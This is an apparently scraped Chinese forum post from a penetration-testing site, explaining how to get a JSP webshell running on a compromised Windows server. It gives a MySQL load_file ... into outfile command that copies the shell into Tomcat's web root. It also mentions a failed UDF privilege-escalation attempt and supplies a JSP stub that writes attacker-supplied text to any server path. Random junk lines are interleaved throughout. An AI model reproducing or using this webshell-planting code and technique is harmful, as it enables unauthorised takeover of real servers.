中国网络渗透测试联盟
标题:
解决Win下MySQL root导出Webshell换行符问题
[打印本页]
作者:
admin
时间:
2013-3-8 21:52
标题:
解决Win下MySQL root导出Webshell换行符问题
今天碰到了这么个问题,简单记录一下我的解决方案。
$ ~- ^7 U0 W) s7 d$ Q; R. x8 b
% ^$ \" [ x/ `8 }
首先说一下服务器的环境。服务器的80端口按照标准的虚拟主机来配置的,支持asp,aspx,php,但是不支持php
. u R! R( g7 U8 e! k4 J* j
安装了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)
; D. [# b" g5 g; F) }. h
提权的时候没有sa密码,没有serv-u密码,mysql 5.1首先运行了
* a& L1 d; \) L) K4 i# e
1 show variables like '%plugin%';
0 H. c8 U2 m7 O4 N
后,根据设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\成功
2 t# U4 Q7 [5 v' }* C# M
创建自定义函数似乎被拦截,一直失败。
/ L" q+ ~6 y; v
后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/webapps/ROOT/均无写入权限
( T" }+ z8 E% E5 l" E$ U
测试mysql有写入权限。故上传jsp大马至网站web目录:d:\xxx\fuck.jsp
# |6 `$ t6 n D) b9 R, b
用mysql执行语句:
9 {+ q& u2 x3 |1 S" E0 ?& X: \: J
1 select load_file('d:\\xxx\\fuck.jsp') into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\webapps\\ROOT\\upload\\fuck.jsp'
- J* U( t# f- y7 A4 f: s
2 复制代码
1 g) G% N! i- H8 h2 Z( d
后成功。
) p0 u4 e$ [2 c
但是访问后得到如下提示:
6 P! Z/ Q+ @" J9 n9 ^& }/ p
500页面
6 ?& `! ~) Y, t
{2 s* b; s+ n) k$ h' w
7 m$ B' |+ T- } l4 X
明显是MySQL的Win下版本自动添加转义符\n\r了
0 _' ]1 t! m" Y; T% O7 K9 n
这样导致程序运行的悲剧。
' U5 [* d. j9 A# T8 d; @
从网上找了很多方法,什么update把转义符消掉,enclose巴拉巴拉,反正五花八门就是没一个可以用的。
. E; X2 X. v: ]% d: q4 Y
最后弄了这么个小脚本:
& H# p# [8 I: d" M6 |# {
01 <%@ page language="java" pageEncoding="gbk"%>
: _" t8 o- H* {3 y
02 <jsp:directive.page import="java.io.File"/>
8 G* q. U( G+ ~! f3 m& a, e' _$ c) R$ u
03 <jsp:directive.page import="java.io.OutputStream"/>
5 J" g# z* I4 O
04 <jsp:directive.page import="java.io.FileOutputStream"/>
8 j9 T/ J. O0 J. C% j4 G6 J
05 <% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>
?0 Z9 L5 S, [
06 error
www.2cto.com
: w9 p k- v5 T" M! X
07 <%}}if(i==0){%>
3 R/ y3 ~! N( ?/ V, z
08 ok
3 q( s* v8 U M' V7 t# v9 C
09 <%}%>
$ ~8 x) a4 h1 }
10 <form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">
+ O H5 F- E( H. Y+ Q6 N5 W+ D+ I
就可以避免转义符让JSP的马儿运行500错误了。
, L) P4 S8 v z( p
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2